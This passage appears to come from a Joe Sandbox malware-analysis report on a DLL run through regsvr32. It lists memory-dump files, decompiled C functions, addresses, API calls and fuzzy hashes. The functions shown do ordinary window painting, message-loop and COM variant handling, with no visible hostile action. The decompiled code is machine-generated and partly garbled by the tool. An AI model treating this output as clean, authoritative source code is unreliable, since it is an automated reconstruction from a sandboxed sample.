Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prologProgRectWindow
String ID:
API String ID: 493809305-0
Opcode ID: c77fec736ef9c4c7fb66638fc660fff6240ee717d773a7dcb5f00697388b8218
Instruction ID: dacd28f14503b512aaa220e36a9130e298da9a9a3f048616cd1abe4d08268e11
Opcode Fuzzy Hash: c77fec736ef9c4c7fb66638fc660fff6240ee717d773a7dcb5f00697388b8218
Instruction Fuzzy Hash: E3A1097590025ADFDB04CFA8C884AEEB7F4FF08340F15412AF859A7251E774EA94CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002D7C1 Relevance: 10.6, APIs: 7, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E1002D7C1(void* __eax, intOrPtr* __ebx, signed int __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v64;
				signed int* _t16;
				struct HDC__* _t46;
				int _t55;
				struct HDC__* _t58;
				struct HDC__* _t60;
				struct HWND__* _t65;
				void* _t73;
				void* _t74;

				_t16 = __eax +  *__ebx + 5;
				 *__ecx =  *__ecx | __ecx;
				es = es;
				 *__ecx =  *__ecx | __ecx;
				 *_t16 =  *_t16 | __ecx;
				 *_t16 =  *_t16 | __ecx;
				asm("int3");
				_t74 = _t73 - 0x40;
				_push(__ebx);
				_t55 = _a8;
				_t87 = _t55 - 0x82;
				if(_t55 != 0x82) {
					_t65 = _a4;
					__eflags = GetPropA(_t65, 0);
					if(__eflags == 0) {
						__eflags = _t55 - 0xf;
						if(__eflags > 0) {
							__eflags = _t55 - 0x1943;
							if(__eflags < 0) {
								goto L10;
							} else {
								__eflags = _t55 - 0x1944;
								if(__eflags <= 0) {
									 *_a16 = 1;
									return 0x3ec;
								} else {
									goto L10;
								}
							}
						} else {
							if(__eflags == 0) {
								_t46 = _a12;
								_t58 = _t46;
								__eflags = _t58;
								if(_t58 == 0) {
									_t58 = BeginPaint(_t65,  &_v64);
									E1002A820(_t65, _t30);
									_t74 = _t74 + 8;
								}
								E1002D630(_t65, _t58);
								__eflags = _t46;
								if(_t46 == 0) {
									EndPaint(_t65,  &_v64);
								}
								__eflags = 0;
								return 0;
							} else {
								__eflags = _t55 - 0xa;
								if(__eflags == 0) {
									_t60 = GetDC(_t65);
									E1002A820(_t65, _t32);
									E1002D630(_t65, _t60);
									ReleaseDC(_t65, _t60);
									__eflags = 0;
									return 0;
								} else {
									L10:
									return CallWindowProcA(E1002A360(__eflags, _t65, 4), _t65, _t55, _a12, _a16);
								}
							}
						}
					} else {
						return CallWindowProcA(E1002A360(__eflags, _t65, 4), _t65, _t55, _a12, _a16);
					}
				} else {
					return E1002A590(_t87, _a4, _t55, _a12, _a16, 4);
				}
			}

0x1002d7c3
0x1002d7c6
0x1002d7c8
0x1002d7c9
0x1002d7cb
0x1002d7cd
0x1002d7cf
0x1002d7d0
0x1002d7d3
0x1002d7d6
0x1002d7da
0x1002d7e0
0x1002d807
0x1002d819
0x1002d81b
0x1002d844
0x1002d847
0x1002d852
0x1002d858
0x00000000
0x1002d85a
0x1002d85a
0x1002d860
0x1002d90b
0x1002d919
0x00000000
0x00000000
0x00000000
0x1002d860
0x1002d849
0x1002d849
0x1002d8bd
0x1002d8c1
0x1002d8c3
0x1002d8c5
0x1002d8d4
0x1002d8d7
0x1002d8dc
0x1002d8dc
0x1002d8e1
0x1002d8e9
0x1002d8eb
0x1002d8f3
0x1002d8f3
0x1002d8f9
0x1002d901
0x1002d84b
0x1002d84b
0x1002d84e
0x1002d895
0x1002d898
0x1002d8a2
0x1002d8ac
0x1002d8b2
0x1002d8ba
0x1002d850
0x1002d866
0x1002d88a
0x1002d88a
0x1002d84e
0x1002d849
0x1002d81d
0x1002d841
0x1002d841
0x1002d7e2
0x1002d802
0x1002d802

APIs

GetPropA.USER32(?,00000000), ref: 1002D813
CallWindowProcA.USER32(00000000), ref: 1002D835

Part of subcall function 1002A590: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 1002A5B6
Part of subcall function 1002A590: RemovePropA.USER32(?,00000000), ref: 1002A5CE
Part of subcall function 1002A590: RemovePropA.USER32(?,00000000), ref: 1002A5DA

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: f1a7f264d05933c5e64b83451b47ec46299b56d1be98cb8ad6b77efbd8c75446
Instruction ID: 1d08bbc57585689d86a60082f93adda61f29e9e4c72343c922ba404b7c30940b
Opcode Fuzzy Hash: f1a7f264d05933c5e64b83451b47ec46299b56d1be98cb8ad6b77efbd8c75446
Instruction Fuzzy Hash: 6A31B676A012506FE301E798AC85DDF779CEF86361F450427FA09C7201EB79AD0687B6

Uniqueness

Uniqueness Score: -1.00%

Function 10014581 Relevance: 10.6, APIs: 7, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E10014581(void* __ecx) {
				intOrPtr* _t77;
				intOrPtr _t83;
				signed int _t85;
				intOrPtr* _t86;
				intOrPtr* _t90;
				intOrPtr* _t92;
				void* _t99;
				intOrPtr* _t104;
				signed int _t107;
				void* _t123;
				intOrPtr _t126;
				void* _t128;
				void* _t130;
				void* _t131;

				E1001A9E0(0x100776f4, _t128);
				_t131 = _t130 - 0x6c;
				_t123 = __ecx;
				_t107 = 0;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t128 - 0x10) = 0;
				 *(_t128 - 0x18) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L21:
					 *(_t123 + 0x44) =  *(_t123 + 0x44) & 0x00000000;
					 *[fs:0x0] =  *((intOrPtr*)(_t128 - 0xc));
					return 0;
				}
				_t104 = __imp__#9;
				do {
					_t77 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x14)) + 0x24 + (_t107 + _t107 * 4) * 8)) + 4));
					if(_t77 == 0) {
						goto L19;
					}
					 *(_t128 - 0x14) =  *(_t128 - 0x10) << 4;
					while(1) {
						_t126 =  *((intOrPtr*)(_t77 + 8));
						 *((intOrPtr*)(_t128 - 0x20)) =  *_t77;
						 *((intOrPtr*)(_t128 - 0x24)) = 0xfffffffd;
						E1001AB60(_t128 - 0x78, 0, 0x20);
						_t131 = _t131 + 0xc;
						E10017242(_t128 - 0x38);
						 *(_t128 - 4) =  *(_t128 - 4) & 0x00000000;
						_t135 =  *((intOrPtr*)(_t123 + 0x48));
						if( *((intOrPtr*)(_t123 + 0x48)) == 0) {
							_t83 =  *((intOrPtr*)(_t123 + 0x40)) +  *(_t128 - 0x14);
							__eflags = _t83;
						} else {
							_t99 = E10013DAA(_t123, _t135);
							 *(_t128 - 4) = 1;
							E10016FAE(_t99, _t128 - 0x38, _t99);
							 *(_t128 - 4) =  *(_t128 - 4) & 0x00000000;
							 *_t104(_t128 - 0x58, _t128 - 0x58,  *(_t128 - 0x18) + 1);
							_t83 = _t128 - 0x38;
						}
						 *((intOrPtr*)(_t128 - 0x48)) = _t83;
						 *((intOrPtr*)(_t128 - 0x44)) = _t128 - 0x24;
						_t85 = 1;
						 *(_t128 - 0x40) = _t85;
						 *(_t128 - 0x3c) = _t85;
						 *(_t126 + 0xa0) = _t85;
						_t86 =  *((intOrPtr*)(_t126 + 0x4c));
						if(_t86 != 0) {
							_push(_t128 - 0x1c);
							_push(0x10081330);
							_push(_t86);
							if( *((intOrPtr*)( *_t86))() >= 0) {
								_t90 =  *((intOrPtr*)(_t128 - 0x1c));
								 *((intOrPtr*)( *_t90 + 0x18))(_t90,  *((intOrPtr*)(_t126 + 0x94)), 0x10081390, 0, 4, _t128 - 0x48, 0, _t128 - 0x78, _t128 - 0x28);
								_t92 =  *((intOrPtr*)(_t128 - 0x1c));
								 *((intOrPtr*)( *_t92 + 8))(_t92);
								 *(_t126 + 0xa0) =  *(_t126 + 0xa0) & 0x00000000;
								if( *((intOrPtr*)(_t128 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t128 - 0x74)));
								}
								if( *((intOrPtr*)(_t128 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t128 - 0x70)));
								}
								if( *((intOrPtr*)(_t128 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t128 - 0x6c)));
								}
								 *_t104(_t128 - 0x38);
								 *(_t128 - 0x10) =  *(_t128 - 0x10) + 1;
								 *(_t128 - 0x14) =  *(_t128 - 0x14) + 0x10;
							}
						}
						 *(_t128 - 4) =  *(_t128 - 4) | 0xffffffff;
						 *_t104(_t128 - 0x38);
						if( *((intOrPtr*)(_t128 - 0x20)) == 0) {
							break;
						}
						_t77 =  *((intOrPtr*)(_t128 - 0x20));
					}
					_t107 =  *(_t128 - 0x18);
					L19:
					_t107 = _t107 + 1;
					 *(_t128 - 0x18) = _t107;
				} while (_t107 <  *((intOrPtr*)(_t123 + 0x10)));
				goto L21;
			}

0x10014586
0x1001458b
0x1001458f
0x10014591
0x10014596
0x1001459d
0x100145a0
0x100145a3
0x10014703
0x10014706
0x1001470d
0x10014715
0x10014715
0x100145aa
0x100145b1
0x100145bb
0x100145c0
0x00000000
0x00000000
0x100145cc
0x100145d4
0x100145d6
0x100145e1
0x100145e4
0x100145eb
0x100145f0
0x100145f7
0x100145fc
0x10014600
0x10014604
0x10014635
0x10014635
0x10014606
0x10014611
0x1001461a
0x1001461e
0x10014623
0x1001462b
0x1001462d
0x1001462d
0x10014638
0x10014640
0x10014643
0x10014644
0x10014647
0x1001464a
0x10014650
0x10014655
0x10014660
0x10014661
0x10014666
0x1001466b
0x10014670
0x10014690
0x10014693
0x10014699
0x1001469c
0x100146a7
0x100146ac
0x100146ac
0x100146b6
0x100146bb
0x100146bb
0x100146c5
0x100146ca
0x100146ca
0x100146d4
0x100146d6
0x100146d9
0x100146d9
0x1001466b
0x100146dd
0x100146e5
0x100146eb
0x00000000
0x00000000
0x100145d1
0x100145d1
0x100146f1
0x100146f4
0x100146f4
0x100146f8
0x100146f8
0x00000000

APIs

__EH_prolog.LIBCMT ref: 10014586
VariantClear.OLEAUT32(?), ref: 1001462B
SysFreeString.OLEAUT32(00000000), ref: 100146AC
SysFreeString.OLEAUT32(00000000), ref: 100146BB
SysFreeString.OLEAUT32(00000000), ref: 100146CA
VariantClear.OLEAUT32(?), ref: 100146D4
VariantClear.OLEAUT32(?), ref: 100146E5

Part of subcall function 10013DAA: __EH_prolog.LIBCMT ref: 10013DAF
Part of subcall function 10013DAA: VariantClear.OLEAUT32(00000007), ref: 10014303
Part of subcall function 10013DAA: VariantClear.OLEAUT32(?), ref: 10014510

Part of subcall function 10016FAE: VariantCopy.OLEAUT32(?,?), ref: 10016FB6

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Variant$Clear$FreeString$H_prolog$Copy
String ID:
API String ID: 3345578691-0
Opcode ID: 887e0dba9ac2dc4f74a3d38ba36929fcae1303cb29edaf805e02b9bca1a4842e
Instruction ID: 2e5a5348ee45eb525ba02f10d08e524d3843970aaa5d9d13c6d1e34115766210
Opcode Fuzzy Hash: 887e0dba9ac2dc4f74a3d38ba36929fcae1303cb29edaf805e02b9bca1a4842e
Instruction Fuzzy Hash: 56510671E00209EFDB14CFA4D885BDEBBF9FF09304F10412AE116AB291DB74A985CB54

Uniqueness

Uniqueness Score: -1.00%

Function 100449C8 Relevance: 10.6, APIs: 7, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E100449C8(intOrPtr* __ecx) {
				struct HWND__* _t45;
				intOrPtr* _t54;
				int _t63;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr* _t78;
				struct tagMSG* _t80;
				void* _t81;

				_t67 = 1;
				_t78 = __ecx;
				 *((intOrPtr*)(_t81 + 0x18)) = _t67;
				 *(_t81 + 0x14) = 0;
				if(( *(_t81 + 0x28) & 0x00000004) == 0) {
					L2:
					 *((intOrPtr*)(_t81 + 0x10)) = 0;
					L3:
					_t45 = GetParent( *(_t78 + 0x1c));
					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x00000018;
					 *(_t81 + 0x1c) = _t45;
					_t80 = E1004633E() + 0x30;
					L4:
					while( *((intOrPtr*)(_t81 + 0x18)) == 0 || PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
						while( *((intOrPtr*)( *((intOrPtr*)(E1004633E())) + 0x5c))() != 0) {
							if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
								_t63 = _t80->message;
								if(_t63 == 0x118 || _t63 == 0x104) {
									E100454B9(_t78, 1);
									UpdateWindow( *(_t78 + 0x1c));
									 *((intOrPtr*)(_t81 + 0x10)) = 0;
								}
							}
							if( *((intOrPtr*)( *_t78 + 0x70))() == 0) {
								 *(_t78 + 0x24) =  *(_t78 + 0x24) & 0xffffffe7;
								return  *((intOrPtr*)(_t78 + 0x2c));
							} else {
								_t54 = E1004633E();
								_push(_t80);
								if( *((intOrPtr*)( *_t54 + 0x64))() != 0) {
									 *((intOrPtr*)(_t81 + 0x18)) = 1;
									 *(_t81 + 0x14) = 0;
								}
								if(PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L4;
								}
							}
						}
						return L100747AF(0) | 0xffffffff;
					}
					if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
						E100454B9(_t78, 1);
						UpdateWindow( *(_t78 + 0x1c));
						 *((intOrPtr*)(_t81 + 0x10)) = 0;
					}
					if(( *(_t81 + 0x24) & 0x00000001) == 0 &&  *(_t81 + 0x1c) != 0 &&  *(_t81 + 0x14) == 0) {
						SendMessageA( *(_t81 + 0x28), 0x121, 0,  *(_t78 + 0x1c));
					}
					if(( *(_t81 + 0x24) & 0x00000002) != 0) {
						L14:
						 *((intOrPtr*)(_t81 + 0x18)) = 0;
						goto L4;
					} else {
						 *(_t81 + 0x14) =  *(_t81 + 0x14) + 1;
						if(SendMessageA( *(_t78 + 0x1c), 0x36a, 0,  *(_t81 + 0x14)) != 0) {
							goto L4;
						}
						goto L14;
					}
				}
				_t66 = E100452DE(__ecx);
				 *((intOrPtr*)(_t81 + 0x10)) = _t67;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}

0x100449d8
0x100449d9
0x100449db
0x100449df
0x100449e3
0x100449f5
0x100449f5
0x100449f9
0x100449fc
0x10044a02
0x10044a06
0x10044a17
0x00000000
0x10044a1a
0x10044a96
0x10044aaa
0x10044aac
0x10044ab4
0x10044ac1
0x10044ac9
0x10044acb
0x10044acb
0x10044ab4
0x10044ad8
0x10044b16
0x00000000
0x10044ada
0x10044ada
0x10044ae1
0x10044ae9
0x10044aeb
0x10044af3
0x10044af3
0x10044b04
0x00000000
0x10044b06
0x00000000
0x10044b06
0x10044b04
0x10044ad8
0x00000000
0x10044b11
0x10044a33
0x10044a39
0x10044a41
0x10044a43
0x10044a43
0x10044a4c
0x10044a67
0x10044a67
0x10044a72
0x10044a90
0x10044a90
0x00000000
0x10044a74
0x10044a78
0x10044a8e
0x00000000
0x00000000
0x00000000
0x10044a8e
0x10044a72
0x100449e5
0x100449ef
0x100449f3
0x00000000
0x00000000
0x00000000

APIs

GetParent.USER32(?), ref: 100449FC
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 10044A25
UpdateWindow.USER32 ref: 10044A41
SendMessageA.USER32 ref: 10044A67
SendMessageA.USER32 ref: 10044A86
UpdateWindow.USER32 ref: 10044AC9
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 10044AFC

Part of subcall function 100452DE: GetWindowLongA.USER32(?,000000F0), ref: 100452EA

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 2c9a438496b90b2be5880a4bfe9d6a5c0dbc20860ee8f90cd40c8362396cd59b
Instruction ID: 8d9ecdd8e7e2bb323073abdb62adb36c38f1427230e0f4f560d49fc06dd30dae
Opcode Fuzzy Hash: 2c9a438496b90b2be5880a4bfe9d6a5c0dbc20860ee8f90cd40c8362396cd59b
Instruction Fuzzy Hash: E141CF306447829BD721CF258844E1FBBE4FFC0B85F220A2EF885C6191DB71D955CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 1002A670 Relevance: 10.6, APIs: 7, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002A670(struct HDC__* _a4, signed short _a8, signed int _a12) {
				long* _v0;
				struct tagRECT _v24;
				signed short _t56;
				long _t57;
				long* _t73;
				long* _t75;
				struct HDC__* _t78;
				long _t79;
				signed short _t81;

				_t78 = _a4;
				_t79 = SetBkColor(_t78,  *(0x10096d44 + (_a12 & 0x0000ffff) * 4));
				_t73 = _v0;
				_t75 =  &_v24;
				 *_t75 =  *_t73;
				_t75[1] = _t73[1];
				_t75[2] = _t73[2];
				_t81 = _a12;
				_t75[3] = _t73[3];
				_v24.bottom = _v24.top + 1;
				if((_t81 & 0x00000002) != 0) {
					ExtTextOutA(_t78, 0, 0, 2,  &_v24, 0, 0, 0);
				}
				_v24.bottom = _t73[3];
				_v24.right = _v24.left + 1;
				if((_t81 & 0x00000001) != 0) {
					ExtTextOutA(_t78, 0, 0, 2,  &_v24, 0, 0, 0);
				}
				_t56 = _a8;
				if(_a4 != _t56) {
					SetBkColor(_t78,  *(0x10096d44 + (_t56 & 0x0000ffff) * 4));
				}
				_t57 = _t73[2];
				_v24.right = _t57;
				_v24.left = _t57 - 1;
				if((_t81 & 0x00000004) != 0) {
					ExtTextOutA(_t78, 0, 0, 2,  &_v24, 0, 0, 0);
				}
				if((_t81 & 0x00000008) != 0) {
					_v24.left =  *_t73;
					_v24.top = _v24.bottom - 1;
					if((_t81 & 0x00001000) != 0) {
						_v24.right = _v24.right - 2;
					}
					ExtTextOutA(_t78, 0, 0, 2,  &_v24, 0, 0, 0);
				}
				return SetBkColor(_t78, _t79);
			}

0x1002a687
0x1002a693
0x1002a695
0x1002a699
0x1002a6a5
0x1002a6aa
0x1002a6ad
0x1002a6b0
0x1002a6b5
0x1002a6c2
0x1002a6c6
0x1002a6da
0x1002a6da
0x1002a6e3
0x1002a6f1
0x1002a6f5
0x1002a709
0x1002a709
0x1002a70f
0x1002a719
0x1002a727
0x1002a727
0x1002a72d
0x1002a730
0x1002a73a
0x1002a73e
0x1002a752
0x1002a752
0x1002a75d
0x1002a761
0x1002a76f
0x1002a773
0x1002a775
0x1002a775
0x1002a78c
0x1002a78c
0x1002a7a1

APIs

SetBkColor.GDI32(?), ref: 1002A68D
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 1002A6DA
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 1002A709
SetBkColor.GDI32(?,?), ref: 1002A727
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 1002A752
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 1002A78C
SetBkColor.GDI32(?,00000000), ref: 1002A794

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Text$Color
String ID:
API String ID: 3751486306-0
Opcode ID: b8b1eeed81c04e6fecac091b111437136b9e607d5844ee97acd8fccc3fa65122
